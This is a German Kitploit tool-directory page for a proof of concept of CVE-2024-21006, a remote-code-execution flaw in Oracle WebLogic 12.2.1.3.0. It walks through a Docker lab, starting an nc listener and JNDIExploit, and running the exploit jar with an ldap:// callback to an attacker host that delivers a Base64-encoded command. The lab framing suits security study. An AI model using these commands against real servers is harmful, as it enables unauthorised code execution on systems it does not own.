Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21006_PoC — Remote Code Execution (RCE) - Oracle WebLogic 12.2.1.3.0 | Kitploit
Tools/GitHubGitHub/d3fudd/cve-2024-21006_poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubd3fudd/cve-2024-21006_poc

CVE-2024-21006_PoC

Remote Code Execution (RCE) - Oracle WebLogic 12.2.1.3.0

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-21006 PoC

CVE-2024-21006 ist eine kritische Remote-Code-Execution-Schwachstelle (RCE), die den Oracle WebLogic Server betrifft. Der Fehler hängt mit der unsicheren Verwendung des IIOP-Protokolls (Internet Inter-ORB Protocol) und JNDI (Java Naming and Directory Interface) zusammen und ermöglicht es einem nicht authentifizierten Remote-Angreifer, über eine bösartige JNDI-Referenz beliebigen Code auf dem betroffenen Server auszuführen.

Aufbau des Labors

Richte die Umgebung ein:

root@kitploit:~
docker-compose up -d

Um die Shell von Kali zu öffnen:

root@kitploit:~
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash

Um die Shell von WebLogic zu öffnen:

root@kitploit:~
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash

Um die Shell von ExploitBox zu öffnen:

root@kitploit:~
docker exec -it exploitbox /bin/bash

In diesem Schritt haben wir eine lokal laufende Instanz von WebLogic 12.2.1.3.0: http://127.0.0.1:7001/console/login/LoginForm.jsp

Das Labor erkunden

Einfacher PoC:

Auf Kali:

root@kitploit:~
nc -vnlp 1389

Auf ExploitBox:

root@kitploit:~
java -jar CVE-2024-21006.jar <IP des WebLogic> 7001 ldap://<IP von Kali>:1389

Beachte, dass Kali die Verbindung vom WebLogic empfangen hat:

RCE erlangen:

Starte auf Kali den JNDIExploit:

root@kitploit:~
cd /exploit
root@kitploit:~
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <IP von Kali>

Führe auf ExploitBox den Exploit aus:

root@kitploit:~
java -jar CVE-2024-21006.jar <IP des WebLogic> 7001 "ldap://<IP von Kali>:1389/Basic/Command/Base64/<Base64-Befehl>"

Auf Kali siehst du, dass wir den Request empfangen haben:

Auf WebLogic siehst du, dass der Befehl ausgeführt und die Datei erfolgreich erstellt wurde:

Referenzen:

  • https://github.com/lightr3d/CVE-2024-21006_jar
  • https://github.com/momika233/CVE-2024-21006
  • https://blog.csdn.net/zwy15288408160/article/details/138189146
  • https://blog.csdn.net/m0_46109609/article/details/114373594
Tool herunterladen